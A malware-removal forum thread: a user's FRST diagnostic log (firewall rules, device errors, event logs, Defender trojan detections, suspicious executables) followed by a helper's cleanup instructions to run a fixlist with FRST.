FirewallRules: [{F2D75FA1-DA94-4FDB-8948-99D446AD638A}] => (Block) C:\users\betts\appdata\roaming\haiyuinst\plugins\download\minithunderplatform.exe
FirewallRules: [{556657E2-1C1B-4383-87C9-A951BFD4C87C}] => (Allow) C:\Program Files (x86)\Droid4X\Droid4X.exe
FirewallRules: [{EF6257FB-E6E2-4503-98A7-51DE4CF6F995}] => (Allow) C:\Program Files (x86)\Droid4X\download\MiniThunderPlatform.exe
FirewallRules: [{99D1174A-0878-4157-B3E9-7C9D99F758FA}] => (Allow) C:\Program Files (x86)\Droid4X\download\MiniThunderPlatform.exe
FirewallRules: [{F727B2EE-60E6-4D98-8E6A-D9C41E240640}] => (Allow) C:\Program Files\Oracle\VirtualBox\vboxheadless.exe
FirewallRules: [{AC225A2F-315F-4531-8715-668C83B06E14}] => (Allow) LPort=6914
FirewallRules: [{6C8D183A-1181-4B43-8A99-11F41032BD78}] => (Allow) LPort=6914
FirewallRules: [{1E8366BB-D5E2-42D9-AA11-AA803AC831A3}] => (Allow) LPort=6898
FirewallRules: [{AD4D3B65-8CCB-4990-8CC7-7ED512AE9514}] => (Allow) LPort=6898
FirewallRules: [{5DB1BB90-522C-4382-A4CC-A77AA9A780D9}] => (Allow) C:\Program Files (x86)\AirPrint\airprint.exe
FirewallRules: [{1E3C4EE8-7840-48CC-A72E-51BEF5FADEDD}] => (Allow) C:\Program Files (x86)\AirPrint\airprint.exe
FirewallRules: [{3E0C8D1A-EB77-4D6D-AD49-3C6BF3F176FB}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{EA6AD7C4-B625-4CF8-ABF4-D32106C6BDBC}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{DFC5CD23-8D43-419A-8032-AC034BD500E8}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{1044309F-50FC-4DD1-BDAC-C5B3677D89F7}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{77603616-95DD-4B2E-8B62-E206B6F3EB98}] => (Allow) C:\Program Files\iTunes\iTunes.exe
FirewallRules: [{6029E389-3099-4B5A-BE96-11174397FFA2}] => (Allow) C:\Program Files\App Dynamic\AirServer\AirServer.exe
FirewallRules: [{D796B6FE-7CDF-43BA-B000-F80D2ED80A5B}] => (Allow) C:\Program Files\App Dynamic\AirServer\AirServer.exe
FirewallRules: [{1B6CE9B8-FB33-4380-A1BF-E40D9BFF5E19}] => (Allow) LPort=6913
FirewallRules: [{1324C0E3-5988-4332-9241-75EBD746FFE6}] => (Allow) LPort=6913
FirewallRules: [TCP Query User{DEE05DC9-7F2F-4094-9FB7-B459E74E1E73}C:\users\betts\appdata\local\akamai\netsession_win.exe] => (Allow) C:\users\betts\appdata\local\akamai\netsession_win.exe
FirewallRules: [UDP Query User{4D22F139-3BEE-4BE7-A0FC-93583E111F7E}C:\users\betts\appdata\local\akamai\netsession_win.exe] => (Allow) C:\users\betts\appdata\local\akamai\netsession_win.exe
FirewallRules: [{5F32E736-AC3E-4645-A4F4-A48B05344A4A}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{2289EF63-4BA7-4045-B298-9A81D2EF3D11}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [TCP Query User{E9BB70FE-EBD3-4B64-AD14-EFC0B00F9E32}C:\users\betts\appdata\local\akamai\netsession_win.exe] => (Allow) C:\users\betts\appdata\local\akamai\netsession_win.exe
FirewallRules: [UDP Query User{59959C16-FA82-42D1-98AE-C85FCF95A246}C:\users\betts\appdata\local\akamai\netsession_win.exe] => (Allow) C:\users\betts\appdata\local\akamai\netsession_win.exe
FirewallRules: [{4A4AAD24-1DA5-4E8D-AB15-28286D973E52}] => (Allow) LPort=6956
FirewallRules: [{E77088E9-6C4B-4959-A68E-0DD3F65436AC}] => (Allow) LPort=6956
FirewallRules: [{B9B92A0C-CEFA-4EBB-8BA7-347897C7ACDA}] => (Allow) LPort=6921
FirewallRules: [{71FF6163-5B90-494B-B3A5-1AAAD28716EF}] => (Allow) LPort=6921
FirewallRules: [{ABAC801B-CF20-47C8-96F3-9A914E15F2F2}] => (Allow) LPort=6927
FirewallRules: [{61F92B82-ACA3-4088-86B0-01F535F3BDD2}] => (Allow) LPort=6927
FirewallRules: [{7CEB6C14-F605-454D-98D4-BCB550F3CE53}] => (Allow) LPort=6896
FirewallRules: [{747E84AB-EE42-4B68-8ADC-4D77F442F081}] => (Allow) LPort=6896
FirewallRules: [TCP Query User{40C80D61-9F12-42CC-9C1E-3459C0B80696}C:\garenadownload\games\lollcuph\lollcuphinstaller.exe] => (Allow) C:\garenadownload\games\lollcuph\lollcuphinstaller.exe
FirewallRules: [UDP Query User{B52DBF35-3751-42DB-85A6-2816F541B9E3}C:\garenadownload\games\lollcuph\lollcuphinstaller.exe] => (Allow) C:\garenadownload\games\lollcuph\lollcuphinstaller.exe
FirewallRules: [{912D6DDF-1218-4CC6-9EA6-34A8B155F12A}] => (Allow) LPort=6917
FirewallRules: [{30AA60B8-C068-420F-95FD-8F08A827DF9F}] => (Allow) LPort=6917
FirewallRules: [TCP Query User{9F27144C-7D2B-4541-8BCF-9FB45B607822}C:\program files\qcma\qcma.exe] => (Allow) C:\program files\qcma\qcma.exe
FirewallRules: [UDP Query User{74A8591A-4AD0-4E2E-85E2-0BF63311AABA}C:\program files\qcma\qcma.exe] => (Allow) C:\program files\qcma\qcma.exe
FirewallRules: [{28BB5F07-8AC1-4DF8-A5A7-FADDCAF6F541}] => (Allow) LPort=6962
FirewallRules: [{15102DC1-0BDC-4C9A-81CF-45092856DCED}] => (Allow) LPort=6962
FirewallRules: [{0C9A3D22-5740-4A52-8F58-B197BCF821E8}] => (Allow) LPort=6886
FirewallRules: [{256DC5C2-60F7-4A31-BE53-77C3193C1AB4}] => (Allow) LPort=6886
FirewallRules: [{354B376F-D838-4267-9C10-47EC376BEB63}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{CD74D535-B3B8-4C6A-A094-470491A3BA6D}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{65B0C4B0-40B4-41D4-A6AE-57E9A4C6B4E4}] => (Allow) C:\Windows\SysWOW64\muzapp.exe
FirewallRules: [{AC702F5D-359E-4BFF-9E59-1BA3CD3FC12B}] => (Allow) C:\Windows\SysWOW64\muzapp.exe
FirewallRules: [{816EE104-0E87-450F-BD65-331DE3DBA835}] => (Allow) C:\Program Files (x86)\OSTotoSoft\DriverTalent\DriverTalent.exe
FirewallRules: [{68156B91-CF34-473E-AB1A-FFE48978ABE6}] => (Allow) C:\Program Files (x86)\OSTotoSoft\DriverTalent\DTLService.exe
FirewallRules: [TCP Query User{2DEDE834-8850-48FE-B32E-D70E94DB655E}C:\program files (x86)\mobile gamepad server\mobile gamepad.exe] => (Allow) C:\program files (x86)\mobile gamepad server\mobile gamepad.exe
FirewallRules: [UDP Query User{845ABD8A-3861-4F10-8845-70A95F539B4E}C:\program files (x86)\mobile gamepad server\mobile gamepad.exe] => (Allow) C:\program files (x86)\mobile gamepad server\mobile gamepad.exe
FirewallRules: [{C8D58DDC-82EC-4B36-AACE-2B52219CDE9F}] => (Allow) C:\Program Files\Acrylic Wi-Fi Professional\Acrylic.exe
FirewallRules: [{A9DE7928-B3E5-4490-9AFE-996A35A97D6E}] => (Allow) C:\Program Files\Acrylic Wi-Fi Professional\Acrylic.exe
FirewallRules: [{59442BF0-92CF-4C9A-B344-317CD12553D1}] => (Allow) LPort=49197
FirewallRules: [{CD623D4E-E775-4FB2-89B5-50087584E325}] => (Allow) LPort=5000
FirewallRules: [{9EFE0349-207D-456D-AD5E-949C126F1CF6}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{FB10405A-F242-44F7-AC79-B1B62A81E2AA}] => (Allow) C:\Windows.000\WindowsDriver.exe
FirewallRules: [{36CDEA2A-3CC5-4BC2-8729-EDB973DE0900}] => (Allow) C:\Windows.000\WindowsDriver.exe
FirewallRules: [{765D9889-7366-4C10-8515-A22250070418}] => (Allow) LPort=45560
FirewallRules: [TCP Query User{368BA747-8659-49AB-9EAC-4E071851DA36}C:\program files (x86)\microsoft\explorer\explorer.exe] => (Block) C:\program files (x86)\microsoft\explorer\explorer.exe
FirewallRules: [UDP Query User{E5ED5053-B0D8-4CBD-901B-2F4C3050EBE7}C:\program files (x86)\microsoft\explorer\explorer.exe] => (Block) C:\program files (x86)\microsoft\explorer\explorer.exe
FirewallRules: [TCP Query User{9D1F6303-B5D0-4014-9D3A-3DD4BD77A6CF}C:\users\betts\documents\mobaxterm\slash\bin\xwin_mobax.exe] => (Allow) C:\users\betts\documents\mobaxterm\slash\bin\xwin_mobax.exe
FirewallRules: [UDP Query User{E317E324-0D1B-462F-BC06-C98BC590D586}C:\users\betts\documents\mobaxterm\slash\bin\xwin_mobax.exe] => (Allow) C:\users\betts\documents\mobaxterm\slash\bin\xwin_mobax.exe
FirewallRules: [{D29C9F64-A1CE-4743-B8E7-14957B4B6883}] => (Allow) D:\steam\Steam.exe
FirewallRules: [{F7D7CA35-0E6F-4CF9-AADC-1727C73C1BE5}] => (Allow) D:\steam\Steam.exe
FirewallRules: [TCP Query User{805E6E46-5C23-4FD8-A26C-E7131867AD3B}C:\program files (x86)\garenalolph\gamedata\apps\lolph\leagueclient\leagueclient.exe] => (Allow) C:\program files (x86)\garenalolph\gamedata\apps\lolph\leagueclient\leagueclient.exe
FirewallRules: [UDP Query User{5E55CC32-330E-427B-AC33-3D13226C5562}C:\program files (x86)\garenalolph\gamedata\apps\lolph\leagueclient\leagueclient.exe] => (Allow) C:\program files (x86)\garenalolph\gamedata\apps\lolph\leagueclient\leagueclient.exe
FirewallRules: [{3F3AA956-A3E0-4CAA-8F18-2F414FB764A2}] => (Allow) C:\Windows\KMS-R@1n.exe
FirewallRules: [{E3854BBF-9A19-452A-89A0-959BF2EF2B3F}] => (Allow) C:\Windows\KMS-R@1n.exe
FirewallRules: [{39DF7D2E-9042-4EF2-8D38-1257E2D69C76}] => (Allow) C:\Program Files (x86)\Garena\Garena\2.0.1808.0718\gxxsvc.exe
FirewallRules: [{97C03D0C-09CD-4B43-A96A-93D60B7A5F0C}] => (Allow) D:\steam\bin\cef\cef.win7x64\steamwebhelper.exe
FirewallRules: [{625E4791-DAA9-42BC-B7DF-06AAE5304904}] => (Allow) D:\steam\bin\cef\cef.win7x64\steamwebhelper.exe
FirewallRules: [{3BB57094-521B-43C7-BB74-E94A783F49C9}] => (Allow) D:\steam\steamapps\common\Shadowrun Returns\Shadowrun.exe
FirewallRules: [{DED9CFCF-5B35-492A-A237-2346E749C671}] => (Allow) D:\steam\steamapps\common\Shadowrun Returns\Shadowrun.exe
FirewallRules: [{48C712DD-8BDA-4054-A57A-F15AB26D1894}] => (Allow) D:\steam\steamapps\common\EVGA PrecisionX\PrecisionX_x64.exe
FirewallRules: [{30836289-A1D5-4101-AE61-E93AB84F2E21}] => (Allow) D:\steam\steamapps\common\EVGA PrecisionX\PrecisionX_x64.exe
FirewallRules: [{091558FC-AA5D-4A0F-ADB7-57CF8C8D2C44}] => (Allow) D:\steam\steamapps\common\EVGA PrecisionX\Skins\UxfTool.exe
FirewallRules: [{85680DF2-C8C4-42EB-90CD-F116473C13CF}] => (Allow) D:\steam\steamapps\common\EVGA PrecisionX\Skins\UxfTool.exe
FirewallRules: [{FAFA77E5-2933-4767-9AFD-04564C0F2D9A}] => (Allow) C:\Program Files (x86)\Microsoft Office\Office15\lync.exe
FirewallRules: [{A742D13E-398D-4F1F-9998-DE1BE7E7688A}] => (Allow) C:\Program Files (x86)\Microsoft Office\Office15\lync.exe
FirewallRules: [{191AB890-BC9C-47E7-BEBE-FFEE55BDD0E2}] => (Allow) C:\Program Files (x86)\Microsoft Office\Office15\UcMapi.exe
FirewallRules: [{BF63C3C6-F0D5-494C-8FD5-6814532B64E4}] => (Allow) C:\Program Files (x86)\Microsoft Office\Office15\UcMapi.exe
FirewallRules: [{A7DC9A53-3EE4-4D87-9CE6-59FB59316143}] => (Allow) C:\ProgramData\audio.exe
FirewallRules: [{6A562CFB-BA08-4E69-B474-AD11C8F29BE4}] => (Allow) C:\ProgramData\audio.exe
FirewallRules: [{BC891867-6204-4CEB-8B9B-03433BD4EBCE}] => (Allow) C:\Program Files (x86)\MediaMonkey\MediaMonkey (non-skinned).exe
FirewallRules: [{85D486BB-54BD-4651-9E87-48B580C66C8E}] => (Allow) C:\Program Files (x86)\MediaMonkey\MediaMonkey (non-skinned).exe
FirewallRules: [{40F6E944-1B85-4266-B724-10A0CB51EC54}] => (Allow) C:\Program Files (x86)\MediaMonkey\MediaMonkey (non-skinned).exe
FirewallRules: [{8BBDD2B3-4B4E-41D1-B0C3-B955D4ED0934}] => (Allow) D:\CsGO Warzone\Loader.exe
FirewallRules: [{F2772A23-4D51-4827-BA3F-B73FB0366357}] => (Allow) D:\CsGO Warzone\csgo_launcher.exe
FirewallRules: [TCP Query User{DEC7795F-EA3A-4EEC-A96D-151A4501FD61}D:\csgo warzone\csgo.exe] => (Allow) D:\csgo warzone\csgo.exe
FirewallRules: [UDP Query User{6432F456-4F38-46C8-B0F9-304EE6363924}D:\csgo warzone\csgo.exe] => (Allow) D:\csgo warzone\csgo.exe
FirewallRules: [{9BB38CC9-7A2F-40E2-AE8F-238D0DA24788}] => (Allow) C:\Program Files (x86)\arcai.com\aips.exe
FirewallRules: [{361AD987-1870-4C5F-A49B-CCE402AFC7EA}] => (Allow) C:\Program Files (x86)\arcai.com\aips.exe
FirewallRules: [{258B0671-537A-4683-ABE8-633BFC69FD02}] => (Allow) C:\Program Files (x86)\arcai.com\netcut_windows.exe
FirewallRules: [{F5016CA6-53E9-4C2B-A70C-443D53838102}] => (Allow) C:\Program Files (x86)\arcai.com\netcut_windows.exe
FirewallRules: [{B1EA146C-D8A9-419B-9887-8202D3B8C61B}] => (Allow) C:\ProgramData\audio.exe
FirewallRules: [{29BD916A-58BB-4DF6-B96E-F977ECDD3781}] => (Allow) C:\ProgramData\audio.exe

==================== Restore Points =========================

Check "winmgmt" service or repair WMI.


==================== Faulty Device Manager Devices =============

Name: memudrv
Description: memudrv
Class Guid: {8ECC055D-047F-11D1-A537-0000F8753ED1}
Manufacturer:
Service: memudrv
Problem: : This device is not present, is not working properly, or does not have all its drivers installed. (Code 24)
Resolution: The device is installed incorrectly. The problem could be a hardware failure, or a new driver might be needed.
Devices stay in this state if they have been prepared for removal.
After you remove the device, this error disappears.Remove the device, and this error should be resolved.

Name: Teredo Tunneling Pseudo-Interface
Description: Microsoft Teredo Tunneling Adapter
Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
Manufacturer: Microsoft
Service: tunnel
Problem: : This device cannot start. (Code10)
Resolution: Device failed to start. Click "Update Driver" to update the drivers for this device.
On the "General Properties" tab of the device, click "Troubleshoot" to start the troubleshooting wizard.

Name: MTP USB Device
Description: MTP USB Device
Class Guid: {eec5ad98-8080-425f-922a-dabf3de3f69a}
Manufacturer: (Standard MTP Device)
Service: WUDFRd
Problem: : This device cannot start. (Code10)
Resolution: Device failed to start. Click "Update Driver" to update the drivers for this device.
On the "General Properties" tab of the device, click "Troubleshoot" to start the troubleshooting wizard.

Name: MediaTek DA USB VCOM (Android) (COM5)
Description: MediaTek DA USB VCOM (Android)
Class Guid: {4d36e978-e325-11ce-bfc1-08002be10318}
Manufacturer: MediaTek Inc.
Service: wdm_usb
Problem: : This device cannot start. (Code10)
Resolution: Device failed to start. Click "Update Driver" to update the drivers for this device.
On the "General Properties" tab of the device, click "Troubleshoot" to start the troubleshooting wizard.

Name: MediaTek USB Port (COM6)
Description: MediaTek USB Port
Class Guid: {4d36e978-e325-11ce-bfc1-08002be10318}
Manufacturer: MediaTek Inc.
Service: wdm_usb
Problem: : This device cannot start. (Code10)
Resolution: Device failed to start. Click "Update Driver" to update the drivers for this device.
On the "General Properties" tab of the device, click "Troubleshoot" to start the troubleshooting wizard.

Name: Android Gadget VCOM Driver (COM15)
Description: Android Gadget VCOM Driver
Class Guid: {4d36e978-e325-11ce-bfc1-08002be10318}
Manufacturer: MediaTek Inc.
Service: usbser
Problem: : This device cannot start. (Code10)
Resolution: Device failed to start. Click "Update Driver" to update the drivers for this device.
On the "General Properties" tab of the device, click "Troubleshoot" to start the troubleshooting wizard.

Name: MediaTek DA USB VCOM Port (COM16)
Description: MediaTek DA USB VCOM Port
Class Guid: {4d36e978-e325-11ce-bfc1-08002be10318}
Manufacturer: MediaTek Inc.
Service: usbser
Problem: : This device cannot start. (Code10)
Resolution: Device failed to start. Click "Update Driver" to update the drivers for this device.
On the "General Properties" tab of the device, click "Troubleshoot" to start the troubleshooting wizard.


==================== Event log errors: =========================

Application errors:
==================
Error: (11/01/2018 01:18:32 PM) (Source: VSS) (EventID: 8193) (User: )
Description: Volume Shadow Copy Service error: Unexpected error calling routine CoCreateInstance. hr = 0x80070422, The service cannot be started, either because it is disabled or because it has no enabled devices associated with it.
.


Operation:
Instantiating VSS server

Error: (11/01/2018 01:18:32 PM) (Source: VSS) (EventID: 13) (User: )
Description: Volume Shadow Copy Service information: The COM Server with CLSID {e579ab5f-1cc4-44b4-bed9-de0991ff0623} and name IVssCoordinatorEx2 cannot be started. [0x80070422, The service cannot be started, either because it is disabled or because it has no enabled devices associated with it.
]


Operation:
Instantiating VSS server

Error: (11/01/2018 01:15:32 PM) (Source: Microsoft Security Client Setup) (EventID: 100) (User: Betts-PC)
Description: HRESULT:0x80070656
Description:Cannot complete the Security Essentials installation. An error has prevented the Security Essentials setup wizard from completing successfully. Please restart your computer and try again. Error code:0x80070656. Error opening installation log file. Verify that the specified log file location exists and that you can write to it.

Error: (11/01/2018 01:15:23 PM) (Source: MsiInstaller) (EventID: 1043) (User: NT AUTHORITY)
Description: Failed to end a Windows Installer transaction d:\1698daab692073d0fa209f086f8452\amd64\epp.msi. Error 1622 occurred while ending the transaction.

Error: (11/01/2018 01:14:59 PM) (Source: Microsoft Security Client Setup) (EventID: 100) (User: Betts-PC)
Description: HRESULT:0x80070656
Description:Cannot complete the Security Essentials installation. An error has prevented the Security Essentials setup wizard from completing successfully. Please restart your computer and try again. Error code:0x80070656. Error opening installation log file. Verify that the specified log file location exists and that you can write to it.

Error: (11/01/2018 01:14:52 PM) (Source: MsiInstaller) (EventID: 1043) (User: NT AUTHORITY)
Description: Failed to end a Windows Installer transaction d:\12abb302ab5599c2e594a7\amd64\epp.msi. Error 1622 occurred while ending the transaction.

Error: (11/01/2018 01:13:18 PM) (Source: System Restore) (EventID: 8193) (User: )
Description: Failed to create restore point (Process = C:\Windows\system32\msiexec.exe /V; Description = Removed Oracle VM VirtualBox 4.3.12_ZZZZ; Error = 0x80042302).

Error: (11/01/2018 01:13:18 PM) (Source: VSS) (EventID: 8193) (User: )
Description: Volume Shadow Copy Service error: Unexpected error calling routine CoCreateInstance. hr = 0x80070422, The service cannot be started, either because it is disabled or because it has no enabled devices associated with it.
.


System errors:
=============
Error: (11/01/2018 12:28:54 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: The server {ABC01078-F197-4B0B-ADBC-CFE684B39C82} did not register with DCOM within the required timeout.

Error: (11/01/2018 10:29:51 AM) (Source: Service Control Manager) (EventID: 7022) (User: )
Description: The Windows Update service hung on starting.

Error: (11/01/2018 10:23:51 AM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: The following boot-start or system-start driver(s) failed to load:
hQjWNzqD
kzeXHiXd
pzLPPFej

Error: (11/01/2018 10:23:38 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The memudrv service failed to start due to the following error:
The system cannot find the path specified.

Error: (10/31/2018 12:04:01 PM) (Source: Service Control Manager) (EventID: 7022) (User: )
Description: The Windows Update service hung on starting.

Error: (10/31/2018 11:57:19 AM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: The following boot-start or system-start driver(s) failed to load:
hQjWNzqD
kzeXHiXd
pzLPPFej

Error: (10/31/2018 11:57:14 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The memudrv service failed to start due to the following error:
The system cannot find the path specified.

Error: (10/30/2018 09:54:24 PM) (Source: nvlddmkm) (EventID: 13) (User: )
Description: Event-ID 13


Windows Defender:
===================================
Date: 2017-04-19 18:17:22.080
Description:
Windows Defender has detected spyware or other potentially unwanted software.
For more information please see the following:
http://go.microsoft.com/fwlink/?linkid=37020&name=TrojanDropper:Win32/Virtumonde.B&threatid=17377
Name:TrojanDropper:Win32/Virtumonde.B
ID:17377
Severity:Severe
Category:Trojan Dropper
Path Found:file:C:\Users\Betts\AppData\Roaming\Spotify\Spotify.exe;process:pid:7220;process:pid:7440;process:pid:7712;process:pid:7780;regkey:HKCU@S-1-5-21-1722513563-2756437970-1780137624-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\\Spotify;regkey:HKCU@S-1-5-21-1722513563-2756437970-1780137624-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\Spotify;runkey:HKCU@S-1-5-21-1722513563-2756437970-1780137624-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\\Spotify;uninstall:HKCU@S-1-5-21-1722513563-2756437970-1780137624-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\Spotify
Detection Type:Concrete
Detection Source:System
Status:Unknown
Process Name:

Date: 2017-04-19 18:17:18.991
Description:
Windows Defender has detected spyware or other potentially unwanted software.
For more information please see the following:
http://go.microsoft.com/fwlink/?linkid=37020&name=TrojanDropper:Win32/Virtumonde.B&threatid=17377
Name:TrojanDropper:Win32/Virtumonde.B
ID:17377
Severity:Severe
Category:Trojan Dropper
Path Found:file:C:\Users\Betts\AppData\Roaming\Spotify\Spotify.exe;process:pid:7220;process:pid:7712;process:pid:7780;regkey:HKCU@S-1-5-21-1722513563-2756437970-1780137624-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\\Spotify;regkey:HKCU@S-1-5-21-1722513563-2756437970-1780137624-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\Spotify;runkey:HKCU@S-1-5-21-1722513563-2756437970-1780137624-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\\Spotify;uninstall:HKCU@S-1-5-21-1722513563-2756437970-1780137624-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\Spotify
Detection Type:Concrete
Detection Source:System
Status:Unknown
Process Name:

Date: 2017-04-19 18:17:16.044
Description:
Windows Defender has detected spyware or other potentially unwanted software.
For more information please see the following:
http://go.microsoft.com/fwlink/?linkid=37020&name=TrojanDropper:Win32/Virtumonde.B&threatid=17377
Name:TrojanDropper:Win32/Virtumonde.B
ID:17377
Severity:Severe
Category:Trojan Dropper
Path Found:file:C:\Users\Betts\AppData\Roaming\Spotify\Spotify.exe;process:pid:7220;process:pid:7712;regkey:HKCU@S-1-5-21-1722513563-2756437970-1780137624-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\\Spotify;regkey:HKCU@S-1-5-21-1722513563-2756437970-1780137624-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\Spotify;runkey:HKCU@S-1-5-21-1722513563-2756437970-1780137624-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\\Spotify;uninstall:HKCU@S-1-5-21-1722513563-2756437970-1780137624-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\Spotify
Detection Type:Concrete
Detection Source:System
Status:Unknown
Process Name:

Date: 2017-04-19 18:17:12.821
Description:
Windows Defender has detected spyware or other potentially unwanted software.
For more information please see the following:
http://go.microsoft.com/fwlink/?linkid=37020&name=TrojanDropper:Win32/Virtumonde.B&threatid=17377
Name:TrojanDropper:Win32/Virtumonde.B
ID:17377
Severity:Severe
Category:Trojan Dropper
Path Found:file:C:\Users\Betts\AppData\Roaming\Spotify\Spotify.exe;process:pid:7712;regkey:HKCU@S-1-5-21-1722513563-2756437970-1780137624-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\\Spotify;regkey:HKCU@S-1-5-21-1722513563-2756437970-1780137624-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\Spotify;runkey:HKCU@S-1-5-21-1722513563-2756437970-1780137624-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\\Spotify;uninstall:HKCU@S-1-5-21-1722513563-2756437970-1780137624-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\Spotify
Detection Type:Concrete
Detection Source:System
Status:Unknown
Process Name:

Date: 2017-04-19 17:56:15.915
Description:
Windows Defender has detected spyware or other potentially unwanted software.
For more information please see the following:
http://go.microsoft.com/fwlink/?linkid=37020&name=TrojanDropper:Win32/Virtumonde.B&threatid=17377
Name:TrojanDropper:Win32/Virtumonde.B
ID:17377
Severity:Severe
Category:Trojan Dropper
Path Found:file:C:\Users\Betts\AppData\Roaming\Spotify\Spotify.exe;regkey:HKCU@S-1-5-21-1722513563-2756437970-1780137624-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\\Spotify;regkey:HKCU@S-1-5-21-1722513563-2756437970-1780137624-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\Spotify;runkey:HKCU@S-1-5-21-1722513563-2756437970-1780137624-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\\Spotify;uninstall:HKCU@S-1-5-21-1722513563-2756437970-1780137624-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\Spotify
Detection Type:Concrete
Detection Source:System
Status:Unknown
Process Name:

CodeIntegrity:
===================================

Date: 2018-05-03 21:38:12.843
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\qcusbser.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2018-05-03 21:38:12.816
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\qcusbser.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2018-05-03 21:38:12.492
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\qcusbser.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2018-05-03 21:38:12.480
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\qcusbser.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2018-02-07 17:09:43.400
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\nxusbf.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2018-02-07 17:09:43.398
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\nxusbf.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2018-02-07 17:09:43.113
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\nxusbh.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2018-02-07 17:09:43.111
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\nxusbh.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

==================== Memory info ===========================

Processor: Intel(R) Core(TM) i7-3770 CPU @ 3.40GHz
Percentage of memory in use: 67%
Total physical RAM: 8159.14 MB
Available physical RAM: 2658.27 MB
Total Virtual: 16316.46 MB
Available Virtual: 10294.55 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:401.27 GB) (Free:97.08 GB) NTFS
Drive d: () (Fixed) (Total:530.14 GB) (Free:403.46 GB) NTFS
Drive e: (2018103013480639) (CDROM) (Total:0.22 GB) (Free:0 GB) CDFS

\\?\Volume{0524b40c-b028-11e2-8930-806e6f6e6963}\ (System Reserved) (Fixed) (Total:0.1 GB) (Free:0.06 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7/8/10) (Size: 931.5 GB) (Disk ID: 00000001)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=401.3 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=530.1 GB) - (Type=07 NTFS)

==================== End of Addition.txt ============================
 

Broni

Malware Annihilator
I strongly suggest you obtain legit Windows version as soon as possible.

Uninstall following unwanted programs:

Online Weather
PC Data App


Download attached fixlist.txt file and save it to the Desktop.
NOTE. It's important that both files, FRST and fixlist.txt are in the same location or the fix will not work.

NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system

Run FRST(FRST64) and press the Fix button just once and wait.
The tool will make a log on the Desktop (Fixlog.txt). Please post it to your reply.
 

Attachments

Broni

Malware Annihilator
